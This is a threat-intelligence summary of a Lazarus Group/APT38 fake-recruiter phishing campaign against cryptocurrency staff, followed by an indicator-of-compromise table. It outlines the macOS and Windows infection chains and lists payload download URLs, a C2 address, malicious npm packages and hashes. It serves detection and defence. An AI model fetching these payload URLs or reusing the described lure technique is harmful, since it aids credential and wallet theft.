Lazarus Group (APT38) Targets Crypto Sector with Sophisticated Phishing Campaign
2025-08-28 • Kucoin •
KuCoin links recent fake-recruiter phishing against cryptocurrency-sector personnel to Lazarus Group/APT38, with lures delivered through LinkedIn, Telegram, and X. Non-technical victims are pushed through a fake interview site that claims a missing camera driver and instructs them to run macOS or Windows commands that download payloads from technudge[.]pro. The macOS chain stages files under /var/tmp/CDrivers, launches cloud.sh, opens a fake ChAudioFixer app, and installs a LaunchAgent for persistence, while the Windows chain expands cdrivWin.zip and runs update.vbs through wscript.exe. The Windows package includes Python-based components such as nvidia.py, auto.py, api.py, and command.py for cookie, saved-password, crypto-wallet theft, encrypted communication to 38.146.28[.]177:8080, and remote-control functions. Technical targets are also steered toward malicious repositories, npm packages such as matrix-charts and rtklog, and a GitLab clone flow that the article says abuses CVE-2025-48384.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | api.ipify.org | 2019-12-11 | 2026-03-17 |
| IPv4 | 38.146.28.177 | 2025-08-28 | 2026-01-21 |
| DOMAIN | quiz-nest.com | 2025-06-18 | 2025-09-04 |
| DOMAIN | slowmist.medium.com | 2022-08-16 | 2025-09-01 |
| HASH | c184aa82bd9e70445003a4f3dd4de0b3 | 2025-08-28 | 2025-08-28 |
| HASH | a6add56c8c3cda2a4a247632aa7fc3ea | 2025-08-28 | 2025-08-28 |
| HASH | 61c88b66dc906667ecb9387c0678a1dd | 2025-08-28 | 2025-08-28 |
| HASH | 7b84d1d1ad0887dd0e545d0ba86c4e6… | 2025-08-28 | 2025-08-28 |
| HASH | c17aa46954ed1b9cd147e674de3f255… | 2025-08-28 | 2025-08-28 |
| HASH | 0a03ca9e4b836d54005335e8cedda91… | 2025-08-28 | 2025-08-28 |
| HASH | cd68b8c00708844fefaff84f23f97a6… | 2025-08-28 | 2025-08-28 |
| HASH | 35195bb1f3247be5532a9f0d3712cc13 | 2025-08-28 | 2025-08-28 |
| HASH | 6f7a0864e4b2e9c09121b5a26dd0782… | 2025-08-28 | 2025-08-28 |
| HASH | df994bd9153914e66ceee3f8bcb93527 | 2025-08-28 | 2025-08-28 |
| HASH | f0b2095e384e253bff6fff3a2060811… | 2025-08-28 | 2025-08-28 |
| HASH | 5c9af548cb39a3a2b4f7a91aad0cdccc | 2025-08-28 | 2025-08-28 |
| URL | https://aptiscore.com | 2025-08-28 | 2025-08-28 |
| URL | https://gitlab.tresalabs.com:84… | 2025-08-28 | 2025-08-28 |
| URL | https://aptiscore.com/invite/Lr… | 2025-08-28 | 2025-08-28 |
| URL | https://technudge.pro/adriv-arm… | 2025-08-28 | 2025-08-28 |
| URL | https://technudge.pro/adrivmac-… | 2025-08-28 | 2025-08-28 |
| URL | https://technudge.pro/adrivwin-… | 2025-08-28 | 2025-08-28 |
| URL | https://technudge.pro/adriv-int… | 2025-08-28 | 2025-08-28 |
| URL | https://guest:glpat-2xxxxxxyx@g… | 2025-08-28 | 2025-08-28 |
| URL | https://technudge.pro | 2025-08-28 | 2025-08-28 |
| DOMAIN | easyhiringtool.com | 2025-08-28 | 2025-08-28 |
| DOMAIN | gitlab.tresalabs.com | 2025-08-28 | 2025-08-28 |
| DOMAIN | aptiscore.com | 2025-08-28 | 2025-08-28 |
| DOMAIN | technudge.pro | 2025-08-28 | 2025-08-28 |
| DOMAIN | assessmentbay.com | 2025-08-28 | 2025-08-28 |
| DOMAIN | fireblocksinsight.com | 2025-08-28 | 2025-08-28 |
| IPv4 | 212.85.29.149 | 2025-08-28 | 2025-08-28 |
| IPv4 | 212.85.29.40 | 2025-08-28 | 2025-08-28 |
| IPv4 | 51.210.235.45 | 2025-08-28 | 2025-08-28 |
| IPv4 | 51.210.235.42 | 2025-08-28 | 2025-08-28 |
| IPv4 | 78.110.166.82 | 2025-08-28 | 2025-08-28 |
| IPv4 | 31.220.40.22 | 2025-08-28 | 2025-08-28 |
| IPv4 | 46.202.196.24 | 2025-08-28 | 2025-08-28 |
| DOMAIN | provevidskillcheck.com | 2025-06-18 | 2025-08-28 |
| DOMAIN | doodles.skillquestions.com | 2025-06-18 | 2025-08-28 |
| DOMAIN | evalswift.com | 2025-03-31 | 2025-08-28 |
| URL | https://api.ipify.org | 2025-02-03 | 2025-08-28 |
| DOMAIN | api.jz-aws.info | 2025-01-05 | 2025-08-28 |